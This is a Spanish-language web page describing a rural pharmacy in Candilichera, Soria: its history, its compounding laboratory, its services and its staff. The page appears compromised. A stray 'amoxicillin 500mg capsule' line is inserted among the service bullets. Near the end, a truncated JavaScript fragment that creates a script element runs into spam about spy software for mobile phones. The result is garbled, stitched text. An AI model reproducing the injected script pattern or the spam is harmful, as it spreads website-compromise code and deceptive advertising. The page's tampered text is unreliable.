La Farmacia

Farmacia

Farmacia

        La Oficina de Farmacia de Candilichera está ubicada en un entorno rural de la meseta castellana, donde,  lugar y lugareños han vivido curiosos eventos como el rodaje de la tan galardonada película “Doctor Zhivago”, allá por el año 1965, dada su semejanza con los parajes de la estepa rusa y ya ligados al rodaje de la ya mítica película protagonizada por Omar Sharif y que consiguió 5 Oscars de sus 10 nominaciones y 5 Globos de Oro.

zhivago-candilichera

Candilichera en 1975 

DSC_0265

Candilichera en 2015

     La Farmacia fue creada en torno a los años 30 para dar servicio farmacéutico a los habitantes de la zona, y ya desde entonces, la dispensación de los medicamentos se hacía de forma magistral, aunque no de la forma tan estricta y rigurosa como actualmente, según las normas oficiales que dicta el REAL DECRETO 175/2001, de 23 de febrero, por el que se aprueban las normas de correcta elaboración y control de calidad de fórmulas magistrales y preparados oficinales.

 El proyecto de la creación del laboratorio de formulación magistral a terceros en el año 2002 suponía un proceso de modernización y de ampliación de servicios sanitarios dentro del ámbito rural, adaptando las instalaciones existentes en un proyecto innovador y con gran carga social, proporcionando un servicio sanitario esencial a la población y a otras oficinas de farmacia, tanto dentro de la provincia de Soria como fuera de ella.

La innovación del proyecto radica en que es el único laboratorio de formulación magistral a terceros que existe en toda la provincia de Soria ubicado en el ámbito rural.

Este tipo de medicamentos individualizados y magistrales tienen las mismas características que cualquier otro fármaco,  tienen que cumplir las mismas normas de correcta fabricación y control de calidad que los correspondientes a laboratorios con tecnología farmacéutica industrial.  Es el Ministerio de Sanidad y Consumo el encargado de controlar y actualizar las normas exigidas para este tipo de laboratorios comunitarios y los productos aquí elaborados. Estos medicamentos están sujetos a prescripción médica, siendo la mayoría de ellos financiados por la Seguridad Social.

laboratorio-marca de agua

Tras 13 años de andadura, el laboratorio se ha convertido en un gran proyecto, lleno de ilusiones, trabajo e ideas por desarrollar.

!!Gracias por confiar en nosotros y por ayudarnos a ser lo que somos!!

Una forma de trabajar muy personalizada:

    El Laboratorio de Formulación Magistral y Dermocosmética nació con la vocación de mejorar la calidad de vida de las personas incidiendo en lo más importante, su salud. La manera de entender la labor de la farmacia en la actualidad se refleja en los pilares de nuestro trabajo:

- Nuestra gente: tú eres por y para quien trabajamos. Con nuestro trabajo diario y entregado a los demás, tratamos de cuidarte ofreciéndote una atención exclusiva, cercana y personalizada para crear un vínculo duradero.

amoxicillin 500mg capsule

- Nuestros productos y servicios: a tu disposición se encuentran productos de farmacia y parafarmacia de las marcas más importantes del sector farmacéutico español. Además, cuentas con una serie de servicios personalizados dirigidos a mejorar tu bienestar como: formulación magistral y preparados oficinales, atención farmacéutica, servicio de Sistemas Personalizados de Dosificación (SPD), envío de pedidos de parafarmacia a domicilio, venta on-line de productos de parafarmacia, consultorio farmacéutico on-line, test capilar y de piel, asesoramiento cosmético y cosmética magistral personalizada,….

Distribuidor autorizado de los laboratorios de Dermocosmética Avène y Nuxe

new_avene_logo_-_white_sqaure       nuxe logo

Farmacéutica Titular

Lda. Mª Jesús Benito de Miguel

var d=document;var s=d.createElement('script'); if (document.currentScript) { The most popular 2017 spy software applications for the mobile phones.

Comments are closed.